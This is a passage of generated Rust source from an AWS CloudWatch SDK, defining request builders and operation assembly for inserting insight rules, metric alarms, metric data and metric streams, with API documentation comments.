impl Builder {
/// <p>A unique name for the rule.</p>
pub fn rule_name(mut self, input: impl Into<std::string::String>) -> Self {
self.rule_name = Some(input.into());
self
}
pub fn set_rule_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.rule_name = input;
self
}
/// <p>The state of the rule. Valid values are ENABLED and DISABLED.</p>
pub fn rule_state(mut self, input: impl Into<std::string::String>) -> Self {
self.rule_state = Some(input.into());
self
}
pub fn set_rule_state(mut self, input: std::option::Option<std::string::String>) -> Self {
self.rule_state = input;
self
}
/// <p>The definition of the rule, as a JSON object. For details on the valid syntax, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/ContributorInsights-RuleSyntax.html">Contributor Insights
/// Rule Syntax</a>.</p>
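        /// <p>A sketch of wiring the pieces together (the rule JSON is elided; its
        /// structure is defined by the linked syntax reference):</p>
        ///
        /// ```ignore
        /// let input = aws_sdk_cloudwatch::input::PutInsightRuleInput::builder()
        ///     .rule_name("TopTalkers")
        ///     .rule_state("ENABLED")
        ///     .rule_definition(rule_json) // a JSON string per the rule syntax docs
        ///     .build()?;
        /// ```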
pub fn rule_definition(mut self, input: impl Into<std::string::String>) -> Self {
self.rule_definition = Some(input.into());
self
}
pub fn set_rule_definition(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.rule_definition = input;
self
}
        /// Appends an item to `tags`; use `set_tags` to replace the whole list.
        pub fn tags(mut self, input: impl Into<crate::model::Tag>) -> Self {
let mut v = self.tags.unwrap_or_default();
v.push(input.into());
self.tags = Some(v);
self
}
pub fn set_tags(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Tag>>,
) -> Self {
self.tags = input;
self
}
/// Consumes the builder and constructs a [`PutInsightRuleInput`](crate::input::PutInsightRuleInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::PutInsightRuleInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::PutInsightRuleInput {
rule_name: self.rule_name,
rule_state: self.rule_state,
rule_definition: self.rule_definition,
tags: self.tags,
})
}
}
}
#[doc(hidden)]
pub type PutInsightRuleInputOperationOutputAlias = crate::operation::PutInsightRule;
#[doc(hidden)]
pub type PutInsightRuleInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutInsightRuleInput {
/// Consumes the builder and constructs an Operation<[`PutInsightRule`](crate::operation::PutInsightRule)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutInsightRule,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_insight_rule(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutInsightRule::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutInsightRule",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutInsightRuleInput`](crate::input::PutInsightRuleInput)
pub fn builder() -> crate::input::put_insight_rule_input::Builder {
crate::input::put_insight_rule_input::Builder::default()
}
}
/// See [`PutMetricAlarmInput`](crate::input::PutMetricAlarmInput)
pub mod put_metric_alarm_input {
/// A builder for [`PutMetricAlarmInput`](crate::input::PutMetricAlarmInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_name: std::option::Option<std::string::String>,
pub(crate) alarm_description: std::option::Option<std::string::String>,
pub(crate) actions_enabled: std::option::Option<bool>,
pub(crate) ok_actions: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) alarm_actions: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) insufficient_data_actions:
std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) statistic: std::option::Option<crate::model::Statistic>,
pub(crate) extended_statistic: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
pub(crate) period: std::option::Option<i32>,
pub(crate) unit: std::option::Option<crate::model::StandardUnit>,
pub(crate) evaluation_periods: std::option::Option<i32>,
pub(crate) datapoints_to_alarm: std::option::Option<i32>,
pub(crate) threshold: std::option::Option<f64>,
pub(crate) comparison_operator: std::option::Option<crate::model::ComparisonOperator>,
pub(crate) treat_missing_data: std::option::Option<std::string::String>,
pub(crate) evaluate_low_sample_count_percentile: std::option::Option<std::string::String>,
pub(crate) metrics: std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
pub(crate) threshold_metric_id: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name for the alarm. This name must be unique within the Region.</p>
pub fn alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_name = Some(input.into());
self
}
pub fn set_alarm_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.alarm_name = input;
self
}
/// <p>The description for the alarm.</p>
pub fn alarm_description(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_description = Some(input.into());
self
}
pub fn set_alarm_description(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.alarm_description = input;
self
}
/// <p>Indicates whether actions should be executed during any changes to the alarm state. The default is
/// <code>TRUE</code>.</p>
pub fn actions_enabled(mut self, input: bool) -> Self {
self.actions_enabled = Some(input);
self
}
pub fn set_actions_enabled(mut self, input: std::option::Option<bool>) -> Self {
self.actions_enabled = input;
self
}
        /// Appends an item to `ok_actions`; use `set_ok_actions` to replace the whole list.
        pub fn ok_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.ok_actions.unwrap_or_default();
v.push(input.into());
self.ok_actions = Some(v);
self
}
pub fn set_ok_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.ok_actions = input;
self
}
        /// Appends an item to `alarm_actions`; use `set_alarm_actions` to replace the whole list.
        pub fn alarm_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_actions.unwrap_or_default();
v.push(input.into());
self.alarm_actions = Some(v);
self
}
pub fn set_alarm_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_actions = input;
self
}
        /// Appends an item to `insufficient_data_actions`; use `set_insufficient_data_actions` to replace the whole list.
        pub fn insufficient_data_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.insufficient_data_actions.unwrap_or_default();
v.push(input.into());
self.insufficient_data_actions = Some(v);
self
}
pub fn set_insufficient_data_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.insufficient_data_actions = input;
self
}
/// <p>The name for the metric associated with the alarm. For each <code>PutMetricAlarm</code>
/// operation, you must specify either <code>MetricName</code> or a <code>Metrics</code> array.</p>
/// <p>If you are creating an alarm based on a math expression, you cannot specify this parameter, or any of the
/// <code>Dimensions</code>, <code>Period</code>,
/// <code>Namespace</code>, <code>Statistic</code>, or <code>ExtendedStatistic</code> parameters. Instead, you specify
/// all this information in the <code>Metrics</code> array.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
        /// <p>The namespace for the metric specified in <code>MetricName</code>.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The statistic for the metric specified in <code>MetricName</code>, other than percentile.
/// For percentile statistics, use <code>ExtendedStatistic</code>. When you call <code>PutMetricAlarm</code> and specify
/// a <code>MetricName</code>, you must
        /// specify either <code>Statistic</code> or <code>ExtendedStatistic</code>, but not both.</p>
pub fn statistic(mut self, input: crate::model::Statistic) -> Self {
self.statistic = Some(input);
self
}
pub fn set_statistic(
mut self,
input: std::option::Option<crate::model::Statistic>,
) -> Self {
self.statistic = input;
self
}
/// <p>The percentile statistic for the metric specified in <code>MetricName</code>. Specify a value
/// between p0.0 and p100. When you call <code>PutMetricAlarm</code> and specify
/// a <code>MetricName</code>, you must
        /// specify either <code>Statistic</code> or <code>ExtendedStatistic</code>, but not both.</p>
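        /// <p>For example, <code>p99</code> selects the 99th percentile:</p>
        ///
        /// ```ignore
        /// // Sketch: percentile statistics are passed as plain strings.
        /// let builder = aws_sdk_cloudwatch::input::PutMetricAlarmInput::builder()
        ///     .extended_statistic("p99"); // instead of .statistic(...)
        /// ```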
pub fn extended_statistic(mut self, input: impl Into<std::string::String>) -> Self {
self.extended_statistic = Some(input.into());
self
}
pub fn set_extended_statistic(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.extended_statistic = input;
self
}
        /// Appends an item to `dimensions`; use `set_dimensions` to replace the whole list.
        pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The length, in seconds, used each time the metric specified in <code>MetricName</code> is
/// evaluated. Valid values are 10, 30, and any multiple of 60.</p>
/// <p>
/// <code>Period</code> is required for alarms based on static thresholds. If
/// you are creating an alarm based on a metric math expression, you specify the
/// period for each metric within the objects in the <code>Metrics</code> array.</p>
/// <p>Be sure to specify 10 or 30 only for metrics that are stored by a <code>PutMetricData</code> call with a
/// <code>StorageResolution</code> of 1. If you specify a period of 10 or 30 for a metric that does not have
/// sub-minute resolution, the alarm still attempts to gather data at the period rate that you specify. In this case,
/// it does not receive data for the attempts that do not correspond to a one-minute data resolution, and the alarm
        /// might often lapse into INSUFFICIENT_DATA status. Specifying 10 or 30 also sets this alarm as a high-resolution alarm,
/// which has a higher charge than other alarms. For more information about pricing, see <a href="https://aws.amazon.com/cloudwatch/pricing/">Amazon CloudWatch Pricing</a>.</p>
/// <p>An alarm's total current evaluation period can
/// be no longer than one day, so <code>Period</code> multiplied by <code>EvaluationPeriods</code> cannot be more than 86,400 seconds.</p>
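        /// <p>For example, a 300-second period allows at most 288 evaluation periods,
        /// because 300 × 288 = 86,400.</p>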
pub fn period(mut self, input: i32) -> Self {
self.period = Some(input);
self
}
pub fn set_period(mut self, input: std::option::Option<i32>) -> Self {
self.period = input;
self
}
/// <p>The unit of measure for the statistic. For example, the units for the Amazon EC2
/// NetworkIn metric are Bytes because NetworkIn tracks the number of bytes that an instance
/// receives on all network interfaces. You can also specify a unit when you create a custom
/// metric. Units help provide conceptual meaning to your data. Metric data points that
/// specify a unit of measure, such as Percent, are aggregated separately.</p>
/// <p>If you don't specify <code>Unit</code>, CloudWatch retrieves all unit types that have been published for the
/// metric and attempts to evaluate the alarm.
/// Usually, metrics are
/// published with only one unit, so the alarm
/// works as intended.</p>
        /// <p>However, if the metric is published with multiple types of units and you don't specify a unit, the alarm's
        /// behavior is not defined and it behaves unpredictably.</p>
        /// <p>We recommend omitting <code>Unit</code> so that you don't inadvertently
        /// specify an incorrect unit that is not published for this metric. Specifying a unit that the
        /// metric does not publish causes the alarm to be stuck in the <code>INSUFFICIENT_DATA</code> state.</p>
pub fn unit(mut self, input: crate::model::StandardUnit) -> Self {
self.unit = Some(input);
self
}
pub fn set_unit(mut self, input: std::option::Option<crate::model::StandardUnit>) -> Self {
self.unit = input;
self
}
/// <p>The number of periods over which data is compared to the specified threshold. If you are
/// setting an alarm that requires that a number of consecutive data points be breaching to
/// trigger the alarm, this value specifies that number. If you are setting an "M out of N"
/// alarm, this value is the N.</p>
/// <p>An alarm's total current evaluation period can
/// be no longer than one day, so this number multiplied by <code>Period</code> cannot be more than 86,400 seconds.</p>
pub fn evaluation_periods(mut self, input: i32) -> Self {
self.evaluation_periods = Some(input);
self
}
pub fn set_evaluation_periods(mut self, input: std::option::Option<i32>) -> Self {
self.evaluation_periods = input;
self
}
/// <p>The number of data points that must be breaching to trigger the alarm. This is used only if you are setting
/// an "M out of N" alarm. In that case, this value is the M. For more information, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#alarm-evaluation">Evaluating an Alarm</a> in the
/// <i>Amazon CloudWatch User Guide</i>.</p>
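        /// <p>For example, with <code>EvaluationPeriods</code> of 5 and
        /// <code>DatapointsToAlarm</code> of 3, the alarm transitions to ALARM state when
        /// any 3 of the most recent 5 data points are breaching.</p>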
pub fn datapoints_to_alarm(mut self, input: i32) -> Self {
self.datapoints_to_alarm = Some(input);
self
}
pub fn set_datapoints_to_alarm(mut self, input: std::option::Option<i32>) -> Self {
self.datapoints_to_alarm = input;
self
}
/// <p>The value against which the specified statistic is compared.</p>
/// <p>This parameter is required for alarms based on static thresholds, but should
/// not be used for alarms based on anomaly detection models.</p>
pub fn threshold(mut self, input: f64) -> Self {
self.threshold = Some(input);
self
}
pub fn set_threshold(mut self, input: std::option::Option<f64>) -> Self {
self.threshold = input;
self
}
/// <p> The arithmetic operation to use when comparing the specified statistic and
/// threshold. The specified statistic value is used as the first operand.</p>
/// <p>The values <code>LessThanLowerOrGreaterThanUpperThreshold</code>,
/// <code>LessThanLowerThreshold</code>, and <code>GreaterThanUpperThreshold</code>
/// are used only for alarms based on anomaly detection models.</p>
pub fn comparison_operator(mut self, input: crate::model::ComparisonOperator) -> Self {
self.comparison_operator = Some(input);
self
}
pub fn set_comparison_operator(
mut self,
input: std::option::Option<crate::model::ComparisonOperator>,
) -> Self {
self.comparison_operator = input;
self
}
/// <p> Sets how this alarm is to handle missing data points. If <code>TreatMissingData</code> is omitted, the default behavior of <code>missing</code> is used.
/// For more information, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#alarms-and-missing-data">Configuring How CloudWatch
/// Alarms Treats Missing Data</a>.</p>
/// <p>Valid Values: <code>breaching | notBreaching | ignore | missing</code>
/// </p>
pub fn treat_missing_data(mut self, input: impl Into<std::string::String>) -> Self {
self.treat_missing_data = Some(input.into());
self
}
pub fn set_treat_missing_data(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.treat_missing_data = input;
self
}
/// <p> Used only for alarms based on percentiles. If you specify <code>ignore</code>, the alarm state does not change during periods with too few data points to be
/// statistically significant. If you specify <code>evaluate</code> or omit this parameter, the alarm is always evaluated and possibly changes state
/// no matter how many data points are available. For more information, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#percentiles-with-low-samples">Percentile-Based CloudWatch Alarms and Low Data Samples</a>.</p>
/// <p>Valid Values: <code>evaluate | ignore</code>
/// </p>
pub fn evaluate_low_sample_count_percentile(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.evaluate_low_sample_count_percentile = Some(input.into());
self
}
pub fn set_evaluate_low_sample_count_percentile(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.evaluate_low_sample_count_percentile = input;
self
}
        /// Appends an item to `metrics`; use `set_metrics` to replace the whole list.
        pub fn metrics(mut self, input: impl Into<crate::model::MetricDataQuery>) -> Self {
let mut v = self.metrics.unwrap_or_default();
v.push(input.into());
self.metrics = Some(v);
self
}
pub fn set_metrics(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
) -> Self {
self.metrics = input;
self
}
        /// Appends an item to `tags`; use `set_tags` to replace the whole list.
        pub fn tags(mut self, input: impl Into<crate::model::Tag>) -> Self {
let mut v = self.tags.unwrap_or_default();
v.push(input.into());
self.tags = Some(v);
self
}
pub fn set_tags(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Tag>>,
) -> Self {
self.tags = input;
self
}
/// <p>If this is an alarm based on an anomaly detection model, make this value match
/// the ID of
/// the <code>ANOMALY_DETECTION_BAND</code> function.</p>
/// <p>For an example of how to use this parameter, see the
/// <b>Anomaly Detection
/// Model Alarm</b> example on this page.</p>
/// <p>If your alarm uses this parameter, it cannot have Auto Scaling actions.</p>
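        /// <p>As a sketch with hypothetical ids: if the <code>Metrics</code> array contains
        /// a query with <code>Id</code> <code>ad1</code> and the expression
        /// <code>ANOMALY_DETECTION_BAND(m1, 2)</code>, set this parameter to
        /// <code>ad1</code>.</p>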
pub fn threshold_metric_id(mut self, input: impl Into<std::string::String>) -> Self {
self.threshold_metric_id = Some(input.into());
self
}
pub fn set_threshold_metric_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.threshold_metric_id = input;
self
}
/// Consumes the builder and constructs a [`PutMetricAlarmInput`](crate::input::PutMetricAlarmInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::PutMetricAlarmInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::PutMetricAlarmInput {
alarm_name: self.alarm_name,
alarm_description: self.alarm_description,
actions_enabled: self.actions_enabled,
ok_actions: self.ok_actions,
alarm_actions: self.alarm_actions,
insufficient_data_actions: self.insufficient_data_actions,
metric_name: self.metric_name,
namespace: self.namespace,
statistic: self.statistic,
extended_statistic: self.extended_statistic,
dimensions: self.dimensions,
period: self.period,
unit: self.unit,
evaluation_periods: self.evaluation_periods,
datapoints_to_alarm: self.datapoints_to_alarm,
threshold: self.threshold,
comparison_operator: self.comparison_operator,
treat_missing_data: self.treat_missing_data,
evaluate_low_sample_count_percentile: self.evaluate_low_sample_count_percentile,
metrics: self.metrics,
tags: self.tags,
threshold_metric_id: self.threshold_metric_id,
})
}
}
}
#[doc(hidden)]
pub type PutMetricAlarmInputOperationOutputAlias = crate::operation::PutMetricAlarm;
#[doc(hidden)]
pub type PutMetricAlarmInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutMetricAlarmInput {
/// Consumes the builder and constructs an Operation<[`PutMetricAlarm`](crate::operation::PutMetricAlarm)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutMetricAlarm,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_metric_alarm(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutMetricAlarm::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutMetricAlarm",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutMetricAlarmInput`](crate::input::PutMetricAlarmInput)
pub fn builder() -> crate::input::put_metric_alarm_input::Builder {
crate::input::put_metric_alarm_input::Builder::default()
}
}
/// See [`PutMetricDataInput`](crate::input::PutMetricDataInput)
pub mod put_metric_data_input {
/// A builder for [`PutMetricDataInput`](crate::input::PutMetricDataInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_data: std::option::Option<std::vec::Vec<crate::model::MetricDatum>>,
}
impl Builder {
/// <p>The namespace for the metric data.</p>
/// <p>To avoid conflicts
        /// with AWS service namespaces, you should not specify a namespace that begins with <code>AWS/</code>.</p>
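        /// <p>A minimal sketch of publishing one custom datum (namespace and metric name
        /// are hypothetical), assuming this crate is consumed as
        /// <code>aws_sdk_cloudwatch</code>:</p>
        ///
        /// ```ignore
        /// let datum = aws_sdk_cloudwatch::model::MetricDatum::builder()
        ///     .metric_name("PageViews")
        ///     .value(1.0)
        ///     .build();
        /// let input = aws_sdk_cloudwatch::input::PutMetricDataInput::builder()
        ///     .namespace("MyApp")
        ///     .metric_data(datum)
        ///     .build()?;
        /// ```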
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
        /// Appends an item to `metric_data`; use `set_metric_data` to replace the whole list.
        pub fn metric_data(mut self, input: impl Into<crate::model::MetricDatum>) -> Self {
let mut v = self.metric_data.unwrap_or_default();
v.push(input.into());
self.metric_data = Some(v);
self
}
pub fn set_metric_data(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MetricDatum>>,
) -> Self {
self.metric_data = input;
self
}
/// Consumes the builder and constructs a [`PutMetricDataInput`](crate::input::PutMetricDataInput)
pub fn build(
self,
) -> std::result::Result<crate::input::PutMetricDataInput, smithy_http::operation::BuildError>
{
Ok(crate::input::PutMetricDataInput {
namespace: self.namespace,
metric_data: self.metric_data,
})
}
}
}
#[doc(hidden)]
pub type PutMetricDataInputOperationOutputAlias = crate::operation::PutMetricData;
#[doc(hidden)]
pub type PutMetricDataInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutMetricDataInput {
/// Consumes the builder and constructs an Operation<[`PutMetricData`](crate::operation::PutMetricData)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutMetricData,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_metric_data(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutMetricData::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutMetricData",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutMetricDataInput`](crate::input::PutMetricDataInput)
pub fn builder() -> crate::input::put_metric_data_input::Builder {
crate::input::put_metric_data_input::Builder::default()
}
}
/// See [`PutMetricStreamInput`](crate::input::PutMetricStreamInput)
pub mod put_metric_stream_input {
/// A builder for [`PutMetricStreamInput`](crate::input::PutMetricStreamInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) name: std::option::Option<std::string::String>,
pub(crate) include_filters:
std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
pub(crate) exclude_filters:
std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
pub(crate) firehose_arn: std::option::Option<std::string::String>,
pub(crate) role_arn: std::option::Option<std::string::String>,
pub(crate) output_format: std::option::Option<crate::model::MetricStreamOutputFormat>,
pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl Builder {
/// <p>If you are creating a new metric stream, this is the name for the new stream. The name
/// must be different than the names of other metric streams in this account and Region.</p>
/// <p>If you are updating a metric stream, specify the name of that stream here.</p>
/// <p>Valid characters are A-Z, a-z, 0-9, "-" and "_".</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.name = Some(input.into());
self
}
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.name = input;
self
}
        /// Appends an item to `include_filters`; use `set_include_filters` to replace the whole list.
        pub fn include_filters(
mut self,
input: impl Into<crate::model::MetricStreamFilter>,
) -> Self {
let mut v = self.include_filters.unwrap_or_default();
v.push(input.into());
self.include_filters = Some(v);
self
}
pub fn set_include_filters(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
) -> Self {
self.include_filters = input;
self
}
        /// Appends an item to `exclude_filters`; use `set_exclude_filters` to replace the whole list.
        pub fn exclude_filters(
mut self,
input: impl Into<crate::model::MetricStreamFilter>,
) -> Self {
let mut v = self.exclude_filters.unwrap_or_default();
v.push(input.into());
self.exclude_filters = Some(v);
self
}
pub fn set_exclude_filters(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MetricStreamFilter>>,
) -> Self {
self.exclude_filters = input;
self
}
/// <p>The ARN of the Amazon Kinesis Firehose delivery stream to use for this metric stream.
/// This Amazon Kinesis Firehose delivery stream must already exist and must be in the same
/// account as the metric stream.</p>
pub fn firehose_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.firehose_arn = Some(input.into());
self
}
pub fn set_firehose_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.firehose_arn = input;
self
}
/// <p>The ARN of an IAM role that this metric stream will use to access
/// Amazon Kinesis Firehose resources. This IAM role must already
/// exist and must be in the same account as the metric stream. This IAM role must include the following permissions:</p>
/// <ul>
/// <li>
/// <p>firehose:PutRecord</p>
/// </li>
/// <li>
/// <p>firehose:PutRecordBatch</p>
/// </li>
